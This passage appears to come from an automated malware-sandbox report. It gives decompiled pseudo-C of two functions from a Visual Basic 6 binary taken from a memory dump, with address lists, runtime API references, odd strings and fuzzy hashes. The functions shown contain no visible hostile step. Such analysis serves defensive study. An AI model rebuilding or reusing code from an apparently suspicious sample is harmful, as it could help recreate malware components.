          				intOrPtr _v12;
          				intOrPtr _v16;
          				long long _v32;
          				intOrPtr _v36;
          				void* _v52;
          				void* _v56;
          				short _v60;
          				void* _v64;
          				short _v68;
          				signed int _v72;
          				char _v76;
          				intOrPtr _v84;
          				char _v92;
          				char _v100;
          				char _v108;
          				char _v116;
          				char _v124;
          				intOrPtr _v132;
          				intOrPtr _v140;
          				intOrPtr _v148;
          				char _v156;
          				void* _v176;
          				signed int _v180;
          				signed int _v184;
          				void* _v188;
          				signed int _v192;
          				signed int _v204;
          				signed int _v208;
          				signed int _v212;
          				intOrPtr* _v216;
          				signed int _v220;
          				signed int _v224;
          				intOrPtr* _v228;
          				signed int _v232;
          				signed int _v236;
          				intOrPtr* _v240;
          				signed int _v244;
          				signed int _v248;
          				intOrPtr* _v252;
          				signed int _v256;
          				signed int _v260;
          				intOrPtr* _v264;
          				signed int _v268;
          				signed int _v272;
          				signed long long _v276;
          				signed int _v280;
          				signed int _t229;
          				signed int _t231;
          				signed int _t234;
          				char* _t235;
          				signed int _t241;
          				signed int _t245;
          				signed int _t251;
          				signed int _t256;
          				signed int _t263;
          				signed int _t268;
          				signed int _t275;
          				signed int _t280;
          				signed int _t284;
          				signed int _t290;
          				signed int _t295;
          				char* _t317;
          				void* _t327;
          				void* _t329;
          				intOrPtr _t330;
          				intOrPtr* _t331;
          				long long _t355;
          
          				_t330 = _t329 - 0xc;
          				 *[fs:0x0] = _t330;
          				L004011C0();
          				_v16 = _t330;
          				_v12 = 0x401188;
          				_v8 = 0;
          				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t327);
          				_v132 = 0x402eb4;
          				_v140 = 8;
          				L004012D4();
          				_push( &_v108);
          				_t229 =  &_v92;
          				_push(_t229);
          				L004012DA();
          				_v180 = _t229;
          				if(_v180 >= 0) {
          					_v212 = _v212 & 0x00000000;
          				} else {
          					_push(_v180);
          					L004012CE();
          					_v212 = _t229;
          				}
          				_v148 = 2;
          				_v156 = 0x8002;
          				_push( &_v108);
          				_t231 =  &_v156;
          				_push(_t231);
          				L004012E0();
          				_v184 = _t231;
          				_push( &_v108);
          				_push( &_v92);
          				_push(2);
          				L004012EC();
          				_t331 = _t330 + 0xc;
          				_t234 = _v184;
          				if(_t234 != 0) {
          					L004012C8();
          					if( *0x41c614 != 0) {
          						_v216 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v216 = 0x41c614;
          					}
          					_v180 =  *_v216;
          					_t290 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t290;
          					if(_v184 >= 0) {
          						_v220 = _v220 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v220 = _t290;
          					}
          					_v188 = _v76;
          					_t295 =  *((intOrPtr*)( *_v188 + 0x58))(_v188,  &_v72);
          					asm("fclex");
          					_v192 = _t295;
          					if(_v192 >= 0) {
          						_v224 = _v224 & 0x00000000;
          					} else {
          						_push(0x58);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v224 = _t295;
          					}
          					_v204 = _v72;
          					_v72 = _v72 & 0x00000000;
          					L00401322();
          					_t317 =  &_v76;
          					L0040132E();
          					_v116 = 0x80020004;
          					_v124 = 0xa;
          					_v100 = 0x80020004;
          					_v108 = 0xa;
          					_v84 = 0x80020004;
          					_v92 = 0xa;
          					_push( &_v124);
          					_push( &_v108);
          					_push( &_v92);
          					_t355 =  *0x401150;
          					_push(_t317);
          					_push(_t317);
          					_v92 = _t355;
          					asm("fld1");
          					_push(_t317);
          					_push(_t317);
          					_v100 = _t355;
          					asm("fld1");
          					_push(_t317);
          					_push(_t317);
          					_v108 = _t355;
          					L004012F2();
          					_v32 = _t355;
          					_push( &_v124);
          					_push( &_v108);
          					_push( &_v92);
          					_push(3);
          					L004012EC();
          					_t331 = _t331 + 0x10;
          					L004012C8();
          					_push(0);
          					_push(L"Feverroot3");
          					_push( &_v92);
          					L0040133A();
          					_t234 = 0x10;
          					L004011C0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_push(0);
          					_push(_v36);
          					L004012C2();
          					L00401334();
          				}
          				_push(2);
          				_push("ABC");
          				_push(0x402ee4);
          				_push(0);
          				L004012BC();
          				if(_t234 != 5) {
          					if( *0x41c614 != 0) {
          						_v228 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v228 = 0x41c614;
          					}
          					_v180 =  *_v228;
          					_t241 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t241;
          					if(_v184 >= 0) {
          						_v232 = _v232 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v232 = _t241;
          					}
          					_v188 = _v76;
          					_t245 =  *((intOrPtr*)( *_v188 + 0x138))(_v188, L"Morwong4", 1);
          					asm("fclex");
          					_v192 = _t245;
          					if(_v192 >= 0) {
          						_v236 = _v236 & 0x00000000;
          					} else {
          						_push(0x138);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v236 = _t245;
          					}
          					L0040132E();
          					if( *0x41c614 != 0) {
          						_v240 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v240 = 0x41c614;
          					}
          					_v180 =  *_v240;
          					_t251 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t251;
          					if(_v184 >= 0) {
          						_v244 = _v244 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v244 = _t251;
          					}
          					_v188 = _v76;
          					_t256 =  *((intOrPtr*)( *_v188 + 0x130))(_v188,  &_v72);
          					asm("fclex");
          					_v192 = _t256;
          					if(_v192 >= 0) {
          						_v248 = _v248 & 0x00000000;
          					} else {
          						_push(0x130);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v248 = _t256;
          					}
          					_v208 = _v72;
          					_v72 = _v72 & 0x00000000;
          					L00401322();
          					L0040132E();
          					if( *0x41c614 != 0) {
          						_v252 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v252 = 0x41c614;
          					}
          					_v180 =  *_v252;
          					_t263 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t263;
          					if(_v184 >= 0) {
          						_v256 = _v256 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v256 = _t263;
          					}
          					_v188 = _v76;
          					_t268 =  *((intOrPtr*)( *_v188 + 0xc0))(_v188,  &_v176);
          					asm("fclex");
          					_v192 = _t268;
          					if(_v192 >= 0) {
          						_v260 = _v260 & 0x00000000;
          					} else {
          						_push(0xc0);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v260 = _t268;
          					}
          					_v68 = _v176;
          					L0040132E();
          					if( *0x41c614 != 0) {
          						_v264 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v264 = 0x41c614;
          					}
          					_v180 =  *_v264;
          					_t275 =  *((intOrPtr*)( *_v180 + 0x14))(_v180,  &_v76);
          					asm("fclex");
          					_v184 = _t275;
          					if(_v184 >= 0) {
          						_v268 = _v268 & 0x00000000;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v180);
          						_push(_v184);
          						L00401352();
          						_v268 = _t275;
          					}
          					_v188 = _v76;
          					_t280 =  *((intOrPtr*)( *_v188 + 0xc8))(_v188,  &_v176);
          					asm("fclex");
          					_v192 = _t280;
          					if(_v192 >= 0) {
          						_v272 = _v272 & 0x00000000;
          					} else {
          						_push(0xc8);
          						_push(0x402ea0);
          						_push(_v188);
          						_push(_v192);
          						L00401352();
          						_v272 = _t280;
          					}
          					_v60 = _v176;
          					L0040132E();
          					_v276 =  *0x401180 *  *0x401178;
          					 *_t331 = _v276;
          					_t284 =  *((intOrPtr*)( *_a4 + 0x84))(_a4,  &_v76);
          					asm("fclex");
          					_v180 = _t284;
          					if(_v180 >= 0) {
          						_v280 = _v280 & 0x00000000;
          					} else {
          						_push(0x84);
          						_push(0x402cc8);
          						_push(_a4);
          						_push(_v180);
          						L00401352();
          						_v280 = _t284;
          					}
          				}
          				_t235 =  &_v92;
          				_push(_t235);
          				L004012B0();
          				L004012B6();
          				asm("wait");
          				_push(0x41a1f1);
          				L0040132E();
          				L00401334();
          				L00401310();
          				L00401310();
          				return _t235;
          			}







































































          0x00419a95
          0x00419aa4
          0x00419ab0
          0x00419ab8
          0x00419abb
          0x00419ac2
          0x00419ad1
          0x00419ad4
          0x00419adb
          0x00419aee
          0x00419af6
          0x00419af7
          0x00419afa
          0x00419afb
          0x00419b00
          0x00419b0d
          0x00419b22
          0x00419b0f
          0x00419b0f
          0x00419b15
          0x00419b1a
          0x00419b1a
          0x00419b29
          0x00419b33
          0x00419b40
          0x00419b41
          0x00419b47
          0x00419b48
          0x00419b4d
          0x00419b57
          0x00419b5b
          0x00419b5c
          0x00419b5e
          0x00419b63
          0x00419b66
          0x00419b6f
          0x00419b75
          0x00419b81
          0x00419b9e
          0x00419b83
          0x00419b83
          0x00419b88
          0x00419b8d
          0x00419b92
          0x00419b92
          0x00419bb0
          0x00419bc8
          0x00419bcb
          0x00419bcd
          0x00419bda
          0x00419bfc
          0x00419bdc
          0x00419bdc
          0x00419bde
          0x00419be3
          0x00419be9
          0x00419bef
          0x00419bf4
          0x00419bf4
          0x00419c06
          0x00419c1e
          0x00419c21
          0x00419c23
          0x00419c30
          0x00419c52
          0x00419c32
          0x00419c32
          0x00419c34
          0x00419c39
          0x00419c3f
          0x00419c45
          0x00419c4a
          0x00419c4a
          0x00419c5c
          0x00419c62
          0x00419c6f
          0x00419c74
          0x00419c77
          0x00419c7c
          0x00419c83
          0x00419c8a
          0x00419c91
          0x00419c98
          0x00419c9f
          0x00419ca9
          0x00419cad
          0x00419cb1
          0x00419cb2
          0x00419cb8
          0x00419cb9
          0x00419cba
          0x00419cbd
          0x00419cbf
          0x00419cc0
          0x00419cc1
          0x00419cc4
          0x00419cc6
          0x00419cc7
          0x00419cc8
          0x00419ccb
          0x00419cd0
          0x00419cd6
          0x00419cda
          0x00419cde
          0x00419cdf
          0x00419ce1
          0x00419ce6
          0x00419ce9
          0x00419cee
          0x00419cf0
          0x00419cf8
          0x00419cf9
          0x00419d00
          0x00419d01
          0x00419d0b
          0x00419d0c
          0x00419d0d
          0x00419d0e
          0x00419d0f
          0x00419d11
          0x00419d14
          0x00419d1c
          0x00419d1c
          0x00419d21
          0x00419d23
          0x00419d28
          0x00419d2d
          0x00419d2f
          0x00419d37
          0x00419d44
          0x00419d61
          0x00419d46
          0x00419d46
          0x00419d4b
          0x00419d50
          0x00419d55
          0x00419d55
          0x00419d73
          0x00419d8b
          0x00419d8e
          0x00419d90
          0x00419d9d
          0x00419dbf
          0x00419d9f
          0x00419d9f
          0x00419da1
          0x00419da6
          0x00419dac
          0x00419db2
          0x00419db7
          0x00419db7
          0x00419dc9
          0x00419de4
          0x00419dea
          0x00419dec
          0x00419df9
          0x00419e1e
          0x00419dfb
          0x00419dfb
          0x00419e00
          0x00419e05
          0x00419e0b
          0x00419e11
          0x00419e16
          0x00419e16
          0x00419e28
          0x00419e34
          0x00419e51
          0x00419e36
          0x00419e36
          0x00419e3b
          0x00419e40
          0x00419e45
          0x00419e45
          0x00419e63
          0x00419e7b
          0x00419e7e
          0x00419e80
          0x00419e8d
          0x00419eaf
          0x00419e8f
          0x00419e8f
          0x00419e91
          0x00419e96
          0x00419e9c
          0x00419ea2
          0x00419ea7
          0x00419ea7
          0x00419eb9
          0x00419ed1
          0x00419ed7
          0x00419ed9
          0x00419ee6
          0x00419f0b
          0x00419ee8
          0x00419ee8
          0x00419eed
          0x00419ef2
          0x00419ef8
          0x00419efe
          0x00419f03
          0x00419f03
          0x00419f15
          0x00419f1b
          0x00419f28
          0x00419f30
          0x00419f3c
          0x00419f59
          0x00419f3e
          0x00419f3e
          0x00419f43
          0x00419f48
          0x00419f4d
          0x00419f4d
          0x00419f6b
          0x00419f83
          0x00419f86
          0x00419f88
          0x00419f95
          0x00419fb7
          0x00419f97
          0x00419f97
          0x00419f99
          0x00419f9e
          0x00419fa4
          0x00419faa
          0x00419faf
          0x00419faf
          0x00419fc1
          0x00419fdc
          0x00419fe2
          0x00419fe4
          0x00419ff1
          0x0041a016
          0x00419ff3
          0x00419ff3
          0x00419ff8
          0x00419ffd
          0x0041a003
          0x0041a009
          0x0041a00e
          0x0041a00e
          0x0041a024
          0x0041a02b
          0x0041a037
          0x0041a054
          0x0041a039
          0x0041a039
          0x0041a03e
          0x0041a043
          0x0041a048
          0x0041a048
          0x0041a066
          0x0041a07e
          0x0041a081
          0x0041a083
          0x0041a090
          0x0041a0b2
          0x0041a092
          0x0041a092
          0x0041a094
          0x0041a099
          0x0041a09f
          0x0041a0a5
          0x0041a0aa
          0x0041a0aa
          0x0041a0bc
          0x0041a0d7
          0x0041a0dd
          0x0041a0df
          0x0041a0ec
          0x0041a111
          0x0041a0ee
          0x0041a0ee
          0x0041a0f3
          0x0041a0f8
          0x0041a0fe
          0x0041a104
          0x0041a109
          0x0041a109
          0x0041a11f
          0x0041a126
          0x0041a137
          0x0041a144
          0x0041a14f
          0x0041a155
          0x0041a157
          0x0041a164
          0x0041a186
          0x0041a166
          0x0041a166
          0x0041a16b
          0x0041a170
          0x0041a173
          0x0041a179
          0x0041a17e
          0x0041a17e
          0x0041a164
          0x0041a18d
          0x0041a190
          0x0041a191
          0x0041a19c
          0x0041a1a1
          0x0041a1a2
          0x0041a1d3
          0x0041a1db
          0x0041a1e3
          0x0041a1eb
          0x0041a1f0

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419AB0
          • __vbaVarDup.MSVBVM60 ref: 00419AEE
          • #564.MSVBVM60(?,?), ref: 00419AFB
          • __vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00419B15
          • __vbaVarTstNe.MSVBVM60(00008002,?), ref: 00419B48
          • __vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?), ref: 00419B5E
          • #554.MSVBVM60(?,?,004011C6), ref: 00419B75
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,004011C6), ref: 00419B8D
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419BEF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 00419C45
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000058), ref: 00419C6F
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000058), ref: 00419C77
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00419CCB
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A), ref: 00419CE1
          • #554.MSVBVM60(?,?,?,?,?,?,004011C6), ref: 00419CE9
          • #716.MSVBVM60(?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419CF9
          • __vbaChkstk.MSVBVM60(?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D01
          • __vbaLateIdSt.MSVBVM60(?,00000000,?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D14
          • __vbaFreeVar.MSVBVM60(?,00000000,?,Feverroot3,00000000,?,?,?,?,?,?,004011C6), ref: 00419D1C
          • __vbaInStrB.MSVBVM60(00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 00419D2F
          • __vbaNew2.MSVBVM60(00402E90,0041C614,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 00419D50
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419DB2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000138), ref: 00419E11
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000138), ref: 00419E28
          • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 00419E40
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419EA2
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000130), ref: 00419EFE
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000130), ref: 00419F28
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000130), ref: 00419F30
          • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 00419F48
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419FAA
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,000000C0), ref: 0041A009
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,000000C0), ref: 0041A02B
          • __vbaNew2.MSVBVM60(00402E90,0041C614), ref: 0041A043
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 0041A0A5
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,000000C8), ref: 0041A104
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,000000C8), ref: 0041A126
          • __vbaHresultCheckObj.MSVBVM60(00000000,00401188,00402CC8,00000084), ref: 0041A179
          • #546.MSVBVM60(?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A191
          • __vbaVarMove.MSVBVM60(?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A19C
          • __vbaFreeObj.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1D3
          • __vbaFreeVar.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1DB
          • __vbaFreeStr.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1E3
          • __vbaFreeStr.MSVBVM60(0041A1F1,?,00000000,00402EE4,ABC,00000002,?,?,004011C6), ref: 0041A1EB
          Strings
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __vba$CheckFreeHresult$New2$Move$#554ChkstkList$#546#564#680#716Late
          • String ID: ABC$Feverroot3$Morwong4
          • API String ID: 4004030552-2891085420
          • Opcode ID: 88231f88e667e75d79acfb9431c71f58575902691dcb01c164aea49134dcd594
          • Instruction ID: f7546308219a1e6bce983f229d6136b28cc7180134ed01ebb483c6112b8f535f
          • Opcode Fuzzy Hash: 88231f88e667e75d79acfb9431c71f58575902691dcb01c164aea49134dcd594
          • Instruction Fuzzy Hash: AA12C370940228EFDB21DF90CD85BDDBBB6BB04305F1040EAE509B62A1D7785AC9DF5A
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 55%
          			E0041975B(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4) {
          				intOrPtr _v8;
          				intOrPtr _v12;
          				intOrPtr _v16;
          				char _v28;
          				intOrPtr _v32;
          				char _v36;
          				void* _v40;
          				long long _v48;
          				signed int _v52;
          				signed int _v56;
          				char _v64;
          				char _v72;
          				char _v80;
          				char _v88;
          				char _v96;
          				char _v104;
          				intOrPtr _v112;
          				intOrPtr _v120;
          				intOrPtr* _v156;
          				signed int _v160;
          				intOrPtr* _v164;
          				signed int _v168;
          				signed int _v180;
          				signed int _v184;
          				intOrPtr* _v188;
          				signed int _v192;
          				signed int _v196;
          				intOrPtr* _v200;
          				signed int _v204;
          				char* _t92;
          				signed int _t98;
          				signed int _t103;
          				signed int _t118;
          				char* _t127;
          				void* _t134;
          				void* _t136;
          				intOrPtr _t137;
          				long long _t146;
          				long long _t147;
          
          				_t137 = _t136 - 0xc;
          				 *[fs:0x0] = _t137;
          				L004011C0();
          				_v16 = _t137;
          				_v12 = 0x401168;
          				_v8 = 0;
          				_t92 =  *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011c6, _t134);
          				_t146 =  *0x401160;
          				L0040123E();
          				L0040130A();
          				asm("fcomp qword [0x401158]");
          				asm("fnstsw ax");
          				asm("sahf");
          				if(__eflags != 0) {
          					if( *0x41c614 != 0) {
          						_v188 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v188 = 0x41c614;
          					}
          					_v156 =  *_v188;
          					_t98 =  *((intOrPtr*)( *_v156 + 0x14))(_v156,  &_v56);
          					asm("fclex");
          					_v160 = _t98;
          					if(_v160 >= 0) {
          						_t20 =  &_v192;
          						 *_t20 = _v192 & 0x00000000;
          						__eflags =  *_t20;
          					} else {
          						_push(0x14);
          						_push(0x402e80);
          						_push(_v156);
          						_push(_v160);
          						L00401352();
          						_v192 = _t98;
          					}
          					_v164 = _v56;
          					_t103 =  *((intOrPtr*)( *_v164 + 0x110))(_v164,  &_v52);
          					asm("fclex");
          					_v168 = _t103;
          					if(_v168 >= 0) {
          						_t33 =  &_v196;
          						 *_t33 = _v196 & 0x00000000;
          						__eflags =  *_t33;
          					} else {
          						_push(0x110);
          						_push(0x402ea0);
          						_push(_v164);
          						_push(_v168);
          						L00401352();
          						_v196 = _t103;
          					}
          					_v180 = _v52;
          					_v52 = _v52 & 0x00000000;
          					L00401322();
          					L0040132E();
          					_v64 = 0x80020004;
          					_v72 = 0xa;
          					_push( &_v72);
          					L004012FE();
          					_v32 = _t146;
          					L00401334();
          					L004012F8();
          					_t127 =  &_v36;
          					L00401322();
          					_v96 = 0x80020004;
          					_v104 = 0xa;
          					_v80 = 0x80020004;
          					_v88 = 0xa;
          					_v64 = 0x80020004;
          					_v72 = 0xa;
          					_push( &_v104);
          					_push( &_v88);
          					_push( &_v72);
          					_t147 =  *0x401150;
          					_push(_t127);
          					_push(_t127);
          					_v80 = _t147;
          					asm("fld1");
          					_push(_t127);
          					_push(_t127);
          					_v88 = _t147;
          					asm("fld1");
          					_push(_t127);
          					_push(_t127);
          					_v96 = _t147;
          					L004012F2();
          					_v48 = _t147;
          					_push( &_v104);
          					_push( &_v88);
          					_push( &_v72);
          					_push(3);
          					L004012EC();
          					if( *0x41c614 != 0) {
          						_v200 = 0x41c614;
          					} else {
          						_push(0x41c614);
          						_push(0x402e90);
          						L00401304();
          						_v200 = 0x41c614;
          					}
          					_v156 =  *_v200;
          					_v112 = 0x8f;
          					_v120 = 2;
          					L004011C0();
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					asm("movsd");
          					_t118 =  *((intOrPtr*)( *_v156 + 0x34))(_v156, 0x10, 0x6729,  &_v56);
          					asm("fclex");
          					_v160 = _t118;
          					if(_v160 >= 0) {
          						_t77 =  &_v204;
          						 *_t77 = _v204 & 0x00000000;
          						__eflags =  *_t77;
          					} else {
          						_push(0x34);
          						_push(0x402e80);
          						_push(_v156);
          						_push(_v160);
          						L00401352();
          						_v204 = _t118;
          					}
          					_v184 = _v56;
          					_v56 = _v56 & 0x00000000;
          					_push(_v184);
          					_t92 =  &_v28;
          					_push(_t92);
          					L004012E6();
          				}
          				asm("wait");
          				_push(0x419a73);
          				L0040132E();
          				L00401310();
          				L00401310();
          				return _t92;
          			}










































          0x0041975e
          0x0041976d
          0x00419779
          0x00419781
          0x00419784
          0x0041978b
          0x0041979a
          0x0041979d
          0x004197a3
          0x004197a8
          0x004197ad
          0x004197b3
          0x004197b5
          0x004197b6
          0x004197c3
          0x004197e0
          0x004197c5
          0x004197c5
          0x004197ca
          0x004197cf
          0x004197d4
          0x004197d4
          0x004197f2
          0x0041980a
          0x0041980d
          0x0041980f
          0x0041981c
          0x0041983e
          0x0041983e
          0x0041983e
          0x0041981e
          0x0041981e
          0x00419820
          0x00419825
          0x0041982b
          0x00419831
          0x00419836
          0x00419836
          0x00419848
          0x00419860
          0x00419866
          0x00419868
          0x00419875
          0x0041989a
          0x0041989a
          0x0041989a
          0x00419877
          0x00419877
          0x0041987c
          0x00419881
          0x00419887
          0x0041988d
          0x00419892
          0x00419892
          0x004198a4
          0x004198aa
          0x004198b7
          0x004198bf
          0x004198c4
          0x004198cb
          0x004198d5
          0x004198d6
          0x004198db
          0x004198e1
          0x004198e6
          0x004198ed
          0x004198f0
          0x004198f5
          0x004198fc
          0x00419903
          0x0041990a
          0x00419911
          0x00419918
          0x00419922
          0x00419926
          0x0041992a
          0x0041992b
          0x00419931
          0x00419932
          0x00419933
          0x00419936
          0x00419938
          0x00419939
          0x0041993a
          0x0041993d
          0x0041993f
          0x00419940
          0x00419941
          0x00419944
          0x00419949
          0x0041994f
          0x00419953
          0x00419957
          0x00419958
          0x0041995a
          0x00419969
          0x00419986
          0x0041996b
          0x0041996b
          0x00419970
          0x00419975
          0x0041997a
          0x0041997a
          0x00419998
          0x0041999e
          0x004199a5
          0x004199b8
          0x004199c2
          0x004199c3
          0x004199c4
          0x004199c5
          0x004199d4
          0x004199d7
          0x004199d9
          0x004199e6
          0x00419a08
          0x00419a08
          0x00419a08
          0x004199e8
          0x004199e8
          0x004199ea
          0x004199ef
          0x004199f5
          0x004199fb
          0x00419a00
          0x00419a00
          0x00419a12
          0x00419a18
          0x00419a1c
          0x00419a22
          0x00419a25
          0x00419a26
          0x00419a26
          0x00419a2b
          0x00419a2c
          0x00419a5d
          0x00419a65
          0x00419a6d
          0x00419a72

          APIs
          • __vbaChkstk.MSVBVM60(?,004011C6), ref: 00419779
          • _CIsqrt.MSVBVM60(?,?,?,?,004011C6), ref: 004197A3
          • __vbaFpR8.MSVBVM60(?,?,?,?,004011C6), ref: 004197A8
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,?,004011C6), ref: 004197CF
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000014), ref: 00419831
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402EA0,00000110), ref: 0041988D
          • __vbaStrMove.MSVBVM60(00000000,?,00402EA0,00000110), ref: 004198B7
          • __vbaFreeObj.MSVBVM60(00000000,?,00402EA0,00000110), ref: 004198BF
          • #593.MSVBVM60(0000000A), ref: 004198D6
          • __vbaFreeVar.MSVBVM60(0000000A), ref: 004198E1
          • #611.MSVBVM60(0000000A), ref: 004198E6
          • __vbaStrMove.MSVBVM60(0000000A), ref: 004198F0
          • #680.MSVBVM60(?,?,?,?,?,?,0000000A,0000000A,0000000A,0000000A), ref: 00419944
          • __vbaFreeVarList.MSVBVM60(00000003,0000000A,0000000A,0000000A,?,?,?,?,?,?,0000000A,0000000A,0000000A,0000000A), ref: 0041995A
          • __vbaNew2.MSVBVM60(00402E90,0041C614,?,?,?,004011C6), ref: 00419975
          • __vbaChkstk.MSVBVM60(00006729,?), ref: 004199B8
          • __vbaHresultCheckObj.MSVBVM60(00000000,?,00402E80,00000034), ref: 004199FB
          • __vbaObjSet.MSVBVM60(?,?), ref: 00419A26
          • __vbaFreeObj.MSVBVM60(00419A73,?,?,?,?,004011C6), ref: 00419A5D
          • __vbaFreeStr.MSVBVM60(00419A73,?,?,?,?,004011C6), ref: 00419A65
          • __vbaFreeStr.MSVBVM60(00419A73,?,?,?,?,004011C6), ref: 00419A6D
          Memory Dump Source
          • Source File: 00000006.00000002.692270071.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000006.00000002.692260307.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000006.00000002.692368714.000000000041C000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692383099.000000000041F000.00000004.00020000.sdmp Download File
          • Associated: 00000006.00000002.692403050.0000000000421000.00000002.00020000.sdmp Download File
          Similarity
          • API ID: __vba$Free$CheckHresult$ChkstkMoveNew2$#593#611#680IsqrtList
          • String ID:
          • API String ID: 3995339711-0
          • Opcode ID: 2c572e9ddfdfe6eb02bb0ecc0ec81cdc16a9161bac76e999c63f0f7c7c0aed8b
          • Instruction ID: 9d98c09c2021edddc1d2844ddb5ec905830acd095d3dbc7fc42b68673dcb94df
          • Opcode Fuzzy Hash: 2c572e9ddfdfe6eb02bb0ecc0ec81cdc16a9161bac76e999c63f0f7c7c0aed8b
          • Instruction Fuzzy Hash: E7811770910218EFDB10EFA1CD86BDDB7B5BF05304F1040AAE509BB2A1C7795A88CF59
          Uniqueness

          Uniqueness Score: -1.00%